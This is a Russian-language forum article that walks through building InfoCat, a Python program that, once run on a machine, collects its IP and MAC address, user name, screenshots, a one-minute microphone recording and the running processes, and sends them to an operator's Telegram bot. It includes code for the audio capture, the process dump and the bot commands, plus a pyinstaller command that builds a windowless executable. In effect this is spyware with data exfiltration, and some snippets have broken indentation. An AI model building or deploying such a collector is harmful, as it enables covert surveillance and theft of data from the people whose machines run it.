• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

Доступ открыт прямо сейчас Записаться бесплатно

Информация от кота. Обзор программы InfoCat

Mark Klintov

Grey Team
23.07.2022
151
300
Введение
Вспомни, как давно тебя посещала идея написать крупный проект на каком-либо языке? Такие мысли очень часто прилетают к нам из неоткуда и казалось бы, что в этом такого. Но когда начинаешь думать на сцену выходят подводные камни и другие неприятные проблемы. Они и становятся причиной, по которой все наши идеи остаются не реализованными. В этот раз я все же хочу рассказать тебе о своем личном проекте на Python, основная задача которого упростить и автоматизировать некоторые системные процессы.

infocat.png

План работы
Любую работу стоит начать прежде всего с плана. Он весьма короткий, так как статья написана в очень спокойном и расслабляющем стиле. Я не буду нагружать твой мозг огромным количеством информации и постараюсь объясни откуда, что взялось. Первым делом поговорим о истории появления проекта, обсудим его минусы и плюса, а также пробежимся немного по коду. Также я расскажу где это все найти и почему эта программа заслуживает твоего внимания. Приступим.

Предыстория
Расскажу немного о проекте. Началось еще все 2 года назад, когда никто о санкциях даже не думал, а COVID продолжал сидеть у всех в голове. Именно в этот момент появилась идея создать максимально простой и удобный сборщик информации о системе. Проще говоря приложение, которое после запуска собирает по максимум информации и отправляет в самом удобном для пользователя виде. Среди вариантов была отправка на почту, но как ты помнишь для этого требовались дополнительные надстройки. К примеру токен и права, которыми должно владеть приложение (чтение писем или их отправка). Спустя какое то время было принято решения отправлять всю информацию в Telegram, поскольку он удобен для чтения и требует меньше усилий для настройки. Проще говоря, создать бота куда проще и удобнее, чем возится с приложением для работы почты. Язык программирования я решил взять Python из-за его скорости работы и простоты синтаксиса. В результате нескольких махинаций был реализован достаточно простой и понятный проект InfoCat. По сей день я не понимаю, почему выбрал именно это название для будущей программы. Теперь давай разберемся с тем, что он умеет.
Принцип работы
При написании таких приложений следует придерживаться нескольких принципов работы, в их перечень входит:
  1. Скорость работы;
  2. Удобство чтения;
  3. Время отправки.
Отталкиваясь от этих трех пунктов следует начинать разработку. Следующим этапом стали данные, которые ты планируешь вытащить из системы. Я ограничился небольшим списком и предоставил его тебе ниже:
  1. IP адрес;
  2. MAC адрес;
  3. Имя пользователя;
  4. Тип операционной системы;
  5. Скорость работы системы;
  6. Время;
  7. Скриншот;
  8. Скорость интернет-соединения;
  9. Модель процессора;
  10. Частота процессора (минимальная/максимальная/средняя);
  11. Звук с микрофона (длительность записи в секундах);
  12. Запущенные процессы.
Начнем с самого первого, чтобы вытащить IP и MAC адрес из системы тебе потребуется библиотека socket и getpass. Для понятности и простоты кода я использовал минимальное количество циклов и все необходимые данные разделил на переменные. На примере это выглядит следующим образом:

Python:
ip = socket.gethostbyname(socket.gethostname())
mac = get_mac()

Таким простым способом мы собираем базовые параметры системы для ее последующей идентификации. Конечно, если пользователь не имеет белого IP врят ли он тебе чем то поможет в дальнейшем. По мимо этого не будем забывать, что нужно иметь связь с устройством, на которое ты будешь отправлять всю информацию. Для реализации этой задачи я рекомендую использовать aiogram, поскольку он будет надежнее и быстрее в работе. В отличие от своего собрата telebot его реализация более проще и понятнее. Для сравнения рассмотрим отправку сообщения в Телеграм с этих двух библиотек.

Python:
import telebot

token = '<<API_TOKEN>>'
bot = telebot.TeleBot(token)
chatId = <<сhat.id>>
send= 'help'
bot.send_message(chatId, send)

Как ты видишь, чтобы отправить сообщение нам потребуется пять строчек кода. Но не будем забывать, что это лишь одна отправка и если ты хочешь работать в более крупных масштабах тебе придется прописывать это по несколько раз. Как раз в этом и заключается преимущество aiogram, поскольку ты можешь создавать команду и на нее писать отдельные части кода. То есть при выполнении всеми известной функции help твой бот может отправить текст и плюсом какой-нибудь файл или выполнить выключения компьютера. На коде все выглядит это таким образом:

Python:
import aiogram

bot = Bot(token="API_TOCKEN")
dp = Dispatcher(bot)

async def cmd_help(message: types.Message):
    help = "You need help?"
    await message.answer(f'{help}')

dp.register_message_handler(cmd_help, commands="help")

Поэтому под наши нужды подойдет именно такая библиотека. После этого давай разберемся со сбором и отправкой последующей информации в нашего бота. Чтобы узнать скорость интернет соединения (если он вообще есть), ты можешь использовать библиотеку SpeedTest, которая связывается с сайтом и выдает все данные прямо из среды разработки. Ее я выбрал из-за простоты работы, поскольку для реализации этой функции тебе потребуется две строчки кода:

Python:
inet = Speedtest()
download = float(str(inet.download())[0:2] + "."
                 + str(round(inet.download(), 2))[1]) * 0.125
uploads = float(str(inet.upload())[0:2] + "."
                + str(round(inet.download(), 2))[1]) * 0.125

Чтобы узнать частоту процессора вместе со скоростью работы и часовым поясом тебе потребуется задать три переменные из библиотеки psutil и datetime. Реализуется все следующим образом:

Python:
zone = psutil.boot_time()
time = datetime.fromtimestamp(zone)
cpu = psutil.cpu_freq()

Все данные, которые передаются в виде обычного сообщения рекомендуется задавать в самом начале кода, поскольку запись звука и скриншот рабочего экрана ты можешь сделать уже из функции async, таким образом экономя время и обеспечивая себя самой актуальной информацией. К примеру рассмотрим это на записи звука из моего приложения. На коде все выглядит так:

Python:
async def cmd_audio(message: types.Message):
    chunk = 1024
    formats = pyaudio.paInt16
    channels = 2
    rate = 44100
    second = 60     # SECONDS
    names = "sound.wav"
    p = pyaudio.PyAudio()
    stream = p.open(format=formats,
                    channels=channels,
                    rate=rate,
                    input=True,
                    frames_per_buffer=chunk)
    print("")

frames = []

for i in range(0, int(rate / chunk * second)):
        data = stream.read(chunk)
        frames.append(data)

print("")

stream.stop_stream()
    stream.close()
    p.terminate()

wf = wave.open(names, "wb")
    wf.setnchannels(channels)
    wf.setsampwidth(p.get_sample_size(formats))
    wf.setframerate(rate)
    wf.writeframes(b''.join(frames))
    await message.answer_audio(open("sound.wav", "rb"))
    wf.close()
    os.remove(names)

Мы вызываем функцию def и внутри нее создаем все необходимые переменные для работы. То есть если ты используешь команду записи звука, то она исполняется в реальном времени на твоем устройстве и после отправляется прямо в диалог. Здесь я создавал все необходимые переменные для записи звука и использовал стандартную библиотеку pyaudio. Простыми словами после записи всех данных информация сразу же удаляется с устройства.

С процессами все куда проще, поскольку их ты можешь записать в отдельный текстовый документ в виде таблицы и уже на своем компьютере скачать файл, открыть консоль и при помощи команды grep найти необходимые тебе строки. Главное не забывать про кодировку, поскольку без ее указания тебя ждут небольшие сюрпризы. В программе реализация этой функции выглядит следующим образом:

Python:
async def cmd_process(message: types.Message):
    process = [line.decode("cp866", "ignore") for line in Popen("tasklist", stdout=PIPE).stdout.readlines()]
    ride = open("process.txt", "w", encoding="utf-8")
    ride.write(' '.join(process))
    ride.close()
    await message.answer_document(open("process.txt", "rb"))
    ride.close()
    os.remove("process.txt")

Также если ты не хочешь получать предупреждения о использовании нежелательных функций рекомендую использовать в коде такие строки:

Python:
try:
    loop = asyncio.get_event_loop()
    loop.run_until_complete(main())
except DeprecationWarning:
    pass

В программе я использовал перехват исключения, чтобы консоль оставалась чистой и не было ничего лишнего. Для перевода бота в режим прослушивания добавь такую строчку в конец своего кода:

Python:
executor.start_polling(dp, skip_updates=True)

Она запускает работу приложения и позволяет пропускать навязчивые уведомления. Я думаю тебе врят-ли это потребуется. После этого следует идентифицировать каждую команду через aiogram. Выглядит это примерно так:

Python:
dp.register_message_handler(cmd_info, commands="info")
dp.register_message_handler(cmd_screen, commands="screen")
dp.register_message_handler(cmd_audio, commands="audio")
dp.register_message_handler(cmd_process, commands="process")
dp.register_message_handler(cmd_help, commands="help")
dp.register_message_handler(cmd_exit, commands="exit")

Полный код приложения ты можешь посмотреть на моем гитхабе, далее разберемся как правильно создать GUI интерфейс.

Пользовательский интерфейс
Для создания интерфейса ты можешь использовать tkinter или PyQt5. Разница только в удобстве разработки. В первом варианте тебе придется каждый раз запускать приложения, чтобы оценить результат, но при этом ты можешь спокойно работать с кодом. PyQt5 предоставляет тебе среду разработки, но при этом код я крайне не рекомендую менять, поскольку создается он автоматически.

Первое время infocat держался на Tkinter и это было заметно по кривой кнопке билда или смещенным полям. Также при работе с этой библиотекой приходится импортировать все цвета в HEX формат. Но его гибкость в работе помогает быстро и корректно настроить интерфейс.

При работе с PyQt5 я сталкивался с рядом проблем, поскольку среда разработки не позволяла задать скрипты на определенные клавиши. Поэтому чтобы это реализовать тебе потребуется использовать такую строчку кода:

Python:
self.Build.clicked.connect(self.clicked)

В случаи с чтением строки следует использовать функцию:

Python:
self.lineEdit_id.setObjectName("lineEdit_id")

Саму разработку пользовательского интерфейса я советую делать в . В остальном ты с легкостью разберешься и быстро поймешь, что и за что отвечает. Также хочу обратить твое внимания на то, что если ты будешь использовать кастомные шрифты, то они должны быть установлены на устройстве, иначе программа просто не запустится. В случаи с InfoCat тебе требуется установить фон из репозитория.

Работа приложения
По мимо небольшой пробежки по исходному коду я бы хотел уделить внимания результатам, которые мне удалось получить. Сама программа не является идеалом и была создана в целях эксперимента. Более подробно о самом коде и его функциях я рассказывал в . C учетом используемых библиотек и модулей infocat успешно справился со своей задачей, но по прежнему имеет ряд недостатков, такие как:
  1. Скорость сборки файла;
  2. Зависимость от библиотек;
  3. Поддержка части операционных систем.
Также программа не собирает файл в готовый PE-формат, поэтому тебе потребуется библиотека pyinstaller для сборки. Команду для создания я оставил ниже:

Код:
pyinstaller -F -i путь_до_иконки.ico --onefile --noconsole путь_до_файла.py

Подводим итоги
Вернемся к нашему плану и посмотрим чего мы достигли. Я постарался описать тебе что стоит использовать в разработке подобного программного обеспечения и какие ошибки могут появится в результате разработки. На основе всего кода можно создать более обширный функционал, тем самым переведя пассивный сбор информации в активный. Тем самым ты будешь получать информацию в реальном времени, что сделает твою работу проще и эффективнее.

Последнее редактирование модератором:
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab